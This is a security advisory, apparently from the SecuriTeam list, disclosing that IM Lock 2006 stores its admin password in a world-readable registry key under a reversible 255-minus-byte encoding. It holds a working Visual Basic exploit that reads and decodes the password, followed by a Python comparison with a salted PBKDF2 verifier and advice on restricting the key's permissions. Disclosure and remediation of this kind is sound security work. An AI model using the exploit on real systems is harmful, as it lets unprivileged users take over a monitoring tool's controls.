[EXPL] IM Lock Insecure Registry Permission (Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com


IM Lock Insecure Registry Permission (Exploit)
------------------------------------------------------------------------


SUMMARY

IM Lock is security auditing and management software that controls and
blocks access to instant messaging and peer-to-peer services that can
infect computers with viruses.

An encrypted password is stored in the registry, in a key that is readable
by non-privileged users on the system. By decoding the password, a
malicious user could gain access to the config panel.

DETAILS

Exploit:

' ############################################################################
' IM Lock 2006 - Local Password Encryption Weakness Exploit by fRoGGz
' Versions: Home Edition, Enterprise & Professional
' Application: IM Lock 2006
' Distributor : Comvigo, Inc.
' Link: http://www.comvigo.com
' Vulnerable Description: IM Lock 2006 discloses passwords to local users.
'
' Discovered & Coded by fRoGGz
' Credits to: SecuBox Labs - shadock.secubox.com
' ############################################################################

Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" _
    (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long

Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" _
    (ByVal hKey As Long, _
    ByVal lpValueName As String, _
    ByVal lpReserved As Long, _
    lpType As Long, _
    lpData As Any, _
    lpcbData As Long) As Long

' Win32 success return code, used below but not declared in the original listing
Private Const ERROR_SUCCESS As Long = 0

Dim i As Integer
Dim GetCrypt, Decrypt As String

' Reads a string (REG_SZ) value from the registry and returns it without the trailing NUL
Public Function GrabBDR(hKey As Long, strPath As String, strValue As String) As String
    Dim keyhand As Long
    Dim lResult As Long
    Dim lValueType As Long
    Dim strBuf As String
    Dim lDataBufSize As Long
    Dim intZeroPos As Integer
    Dim sBuffer As String

    lResult = RegOpenKey(hKey, strPath, keyhand)
    ' First call passes no buffer: it returns the value type and the size needed
    lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)

    If lValueType = 1 Then ' 1 = REG_SZ
        strBuf = String(lDataBufSize, " ")
        lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
        If lResult = ERROR_SUCCESS Then
            intZeroPos = InStr(strBuf, Chr$(0))
            If intZeroPos > 0 Then
                GrabBDR = Left$(strBuf, intZeroPos - 1)
            End If
        End If
        ' Close the handle that RegOpenKey returned (the original passed the root key)
        lResult = RegCloseKey(keyhand)
    End If
End Function

Private Sub Form_Load()
    ' &H80000002 = HKEY_LOCAL_MACHINE
    GetCrypt = GrabBDR(&H80000002, "SOFTWARE\Microsoft\SvcHst\msnvs", "prc")
    If GetCrypt <> "" Then
        ' The stored value is each password character subtracted from 255
        For i = 1 To Len(GetCrypt)
            Decrypt = Decrypt & Chr(255 - Asc(Mid(GetCrypt, i, 1)))
        Next
        MsgBox "ENCRYPT PASSWORD FOUND !" & vbCrLf & "YOUR PASSWORD IS: " & Decrypt, _
            vbOKOnly, "Secubox Labs - Recovery"
    Else
        MsgBox "NO ENCRYPT PASSWORD FOUND !", vbCritical, "IM LOCK INSTALLED ?"
    End If
    End
End Sub
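
Why the stored value gives no protection, next to a storage format that would: the following is an added example, not part of the original advisory or of the vendor's code. It models the 255-minus-byte transform from the listing above and contrasts it with a salted PBKDF2 verifier; the function names, the latin-1 byte mapping, the iteration count and the sample password are assumptions made for illustration.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

PBKDF2_ITERATIONS = 600_000  # assumption: tune to the hardware in use


def complement_encode(password: str) -> bytes:
    """Weak form, as in the listing: every byte b is stored as 255 - b. No key."""
    return bytes(255 - b for b in password.encode("latin-1"))


def complement_decode(stored: bytes) -> str:
    """The same operation applied again: the transform is its own inverse."""
    return bytes(255 - b for b in stored).decode("latin-1")


def make_verifier(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Hardened form: keep only a random salt and a slow one-way digest."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return salt, digest


def check_password(candidate: str, salt: bytes, digest: bytes) -> bool:
    """Recompute the digest for the candidate and compare in constant time."""
    _, candidate_digest = make_verifier(candidate, salt)
    return hmac.compare_digest(candidate_digest, digest)


def demo() -> dict:
    sample = "Constructed-Sample-1"  # constructed value, not a real password
    stored = complement_encode(sample)
    salt, digest = make_verifier(sample)
    return {
        # Anyone who can read the stored bytes recovers the password itself.
        "recovered": complement_decode(stored),
        # The verifier still lets the config panel check a typed password...
        "verifier_ok": check_password(sample, salt, digest),
        # ...but holds nothing that can be turned back into the password.
        "wrong_rejected": not check_password("guess", salt, digest),
    }


if __name__ == "__main__":
    print(demo())
```

A salted verifier that unprivileged users can read is still open to offline guessing, so the key's ACL should also be limited to administrators and the service account.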


ADDITIONAL INFORMATION

The information has been provided by <mailto:unsecure@xxxxxxxxxxx>
fRoGGz.


